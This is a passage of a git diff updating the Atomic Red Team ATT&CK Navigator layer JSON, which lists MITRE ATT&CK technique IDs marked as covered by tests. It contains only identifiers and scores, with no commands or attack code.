{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index cf3aef14..9444f3fc 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"